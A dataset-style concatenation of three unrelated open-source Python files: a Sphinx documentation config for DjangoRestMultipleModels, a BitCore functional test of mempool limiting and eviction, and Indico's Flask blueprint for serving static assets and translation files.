# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'DjangoRestMultipleModels'
copyright = '2016, Matt Nishi-Broach'
author = 'Matt Nishi-Broach'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.7'
# The full version, including alpha/beta/rc tags.
release = '1.7'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = 'DjangoRestMultipleModels v1.7'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoRestMultipleModelsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'DjangoRestMultipleModels.tex', 'DjangoRestMultipleModels Documentation',
'Matt Nishi-Broach', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'djangorestmultiplemodels', 'DjangoRestMultipleModels Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'DjangoRestMultipleModels', 'DjangoRestMultipleModels Documentation',
author, 'DjangoRestMultipleModels', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
| mit | -2,820,792,643,670,447,600 | 28.281437 | 90 | 0.697342 | false |
LIMXTEC/BitCore | test/functional/mempool_limit.py | 1 | 2019 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test mempool limiting together/eviction with the wallet."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class MempoolLimitTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 1
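        # Note: -maxmempool=5 keeps the mempool tiny (5 MB) so eviction is easy to
        # trigger, -mintxfee pins the wallet's minimum fee rate very low, and
        # -spendzeroconfchange=0 stops the wallet from spending unconfirmed change.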
self.extra_args = [["-maxmempool=5", "-mintxfee=0.00001", "-spendzeroconfchange=0"]]
def run_test(self):
txouts = gen_return_txouts()
relayfee = self.nodes[0].getnetworkinfo()['relayfee']
txids = []
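        # create_confirmed_utxos() (test_framework.util) mines and splits coins into
        # 91 confirmed outputs that the loop below spends in large transactions.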
utxos = create_confirmed_utxos(relayfee, self.nodes[0], 91)
        # Create a mempool tx that will be evicted
us0 = utxos.pop()
inputs = [{ "txid" : us0["txid"], "vout" : us0["vout"]}]
outputs = {self.nodes[0].getnewaddress() : 0.01}
tx = self.nodes[0].createrawtransaction(inputs, outputs)
self.nodes[0].settxfee(relayfee) # specifically fund this tx with low fee
txF = self.nodes[0].fundrawtransaction(tx)
self.nodes[0].settxfee(0) # return to automatic fee selection
txFS = self.nodes[0].signrawtransaction(txF['hex'])
txid = self.nodes[0].sendrawtransaction(txFS['hex'])
relayfee = self.nodes[0].getnetworkinfo()['relayfee']
base_fee = relayfee*100
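        # Fill the mempool with three batches of 30 large transactions, each batch
        # paying a higher fee than the last, so the cheap tx above is evicted first.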
        for i in range(3):
txids.append([])
txids[i] = create_lots_of_big_transactions(self.nodes[0], txouts, utxos[30*i:30*i+30], 30, (i+1)*base_fee)
# by now, the tx should be evicted, check confirmation state
assert(txid not in self.nodes[0].getrawmempool())
txdata = self.nodes[0].gettransaction(txid)
        assert(txdata['confirmations'] == 0)  # confirmation should still be 0
if __name__ == '__main__':
MempoolLimitTest().main()
| mit | -141,675,626,849,960,670 | 41.0625 | 118 | 0.643388 | false |
indico/indico | indico/web/assets/blueprint.py | 1 | 5371 | # This file is part of Indico.
# Copyright (C) 2002 - 2021 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
import os
from flask import Response, current_app, redirect, request, send_from_directory
from werkzeug.exceptions import NotFound
import indico
from indico.core.config import config
from indico.core.plugins import plugin_engine
from indico.util.i18n import get_all_locales
from indico.web.assets.vars_js import generate_global_file, generate_i18n_file, generate_user_file
from indico.web.flask.util import send_file, url_for
from indico.web.flask.wrappers import IndicoBlueprint
assets_blueprint = IndicoBlueprint('assets', __name__, url_prefix='/assets')
assets_blueprint.add_url_rule('!/css/<path:filename>', 'css', build_only=True)
assets_blueprint.add_url_rule('!/images/<path:filename>', 'image', build_only=True)
assets_blueprint.add_url_rule('!/fonts/<path:filename>', 'fonts', build_only=True)
assets_blueprint.add_url_rule('!/dist/<path:filename>', 'dist', build_only=True)
@assets_blueprint.route('!/<any(images,fonts):folder>/<path:filename>__v<version>.<fileext>')
@assets_blueprint.route('!/<any(css,dist,images,fonts):folder>/<path:filename>.<fileext>')
def folder_file(folder, filename, fileext, version=None):
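    # The optional __v<version> suffix exists purely for cache busting; the version
    # value is ignored when resolving the file on disk.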
assets_dir = os.path.join(current_app.root_path, 'web', 'static')
return send_from_directory(assets_dir, os.path.join(folder, filename + '.' + fileext))
@assets_blueprint.route('!/static/plugins/<plugin>/<path:filename>__v<version>.<fileext>')
@assets_blueprint.route('!/static/plugins/<plugin>/<path:filename>.<fileext>')
def plugin_file(plugin, filename, fileext, version=None):
plugin = plugin_engine.get_plugin(plugin)
if not plugin:
raise NotFound
assets_dir = os.path.join(plugin.root_path, 'static')
return send_from_directory(assets_dir, filename + '.' + fileext)
@assets_blueprint.route('!/<filename>')
def root(filename):
assets_dir = os.path.join(current_app.root_path, 'web', 'static')
return send_from_directory(assets_dir, filename)
@assets_blueprint.route('/js-vars/global.js')
def js_vars_global():
"""Provide a JS file with global definitions (all users).
Useful for server-wide config options, URLs, etc...
"""
cache_file = os.path.join(config.CACHE_DIR, f'assets_global_{indico.__version__}_{config.hash}.js')
if config.DEBUG or not os.path.exists(cache_file):
data = generate_global_file()
with open(cache_file, 'w') as f:
f.write(data)
return send_file('global.js', cache_file, mimetype='application/javascript', conditional=True)
@assets_blueprint.route('/js-vars/user.js')
def js_vars_user():
"""Provide a JS file with user-specific definitions.
Useful for favorites, settings etc.
"""
return Response(generate_user_file(), mimetype='application/javascript')
@assets_blueprint.route('/i18n/<locale_name>.js')
def i18n_locale(locale_name):
return _get_i18n_locale(locale_name)
@assets_blueprint.route('/i18n/<locale_name>-react.js')
def i18n_locale_react(locale_name):
return _get_i18n_locale(locale_name, react=True)
def _get_i18n_locale(locale_name, react=False):
"""Retrieve a locale in a Jed-compatible format."""
# Ensure we have a valid locale. en_GB is our source locale and thus always considered
# valid, even if it doesn't exist (dev setup where the user did not compile any locales)
# since otherwise we'd have no valid locales at all and get a redirect loop
all_locales = get_all_locales()
if locale_name not in all_locales and locale_name != 'en_GB':
fallback = config.DEFAULT_LOCALE if config.DEFAULT_LOCALE in all_locales else 'en_GB'
return redirect(url_for(request.endpoint, locale_name=fallback))
react_suffix = '-react' if react else ''
try:
cache_file = os.path.join(config.CACHE_DIR, 'assets_i18n_{}{}_{}_{}.js'.format(
locale_name, react_suffix, indico.__version__, config.hash))
except UnicodeEncodeError:
raise NotFound
if config.DEBUG or not os.path.exists(cache_file):
i18n_data = generate_i18n_file(locale_name, react=react)
if i18n_data is None:
raise NotFound
with open(cache_file, 'w') as f:
f.write('window.{} = {};'.format('REACT_TRANSLATIONS' if react else 'TRANSLATIONS', i18n_data))
return send_file(f'{locale_name}{react_suffix}.js', cache_file, mimetype='application/javascript',
conditional=True)
@assets_blueprint.route('!/static/custom/<any(css,js):folder>/<path:filename>', endpoint='custom')
@assets_blueprint.route('!/static/custom/files/<path:filename>', endpoint='custom', defaults={'folder': 'files'})
def static_custom(folder, filename):
customization_dir = config.CUSTOMIZATION_DIR
if not customization_dir:
raise NotFound
return send_from_directory(os.path.join(customization_dir, folder), filename)
@assets_blueprint.route('!/favicon.ico')
def favicon():
return redirect(url_for('.image', filename='indico.ico'))
@assets_blueprint.route('/avatar/<name>.svg')
@assets_blueprint.route('/avatar/blank.svg')
def avatar(name=None):
from indico.modules.users.util import send_default_avatar
return send_default_avatar(name)
| mit | 1,629,286,778,587,345,700 | 38.785185 | 113 | 0.703407 | false |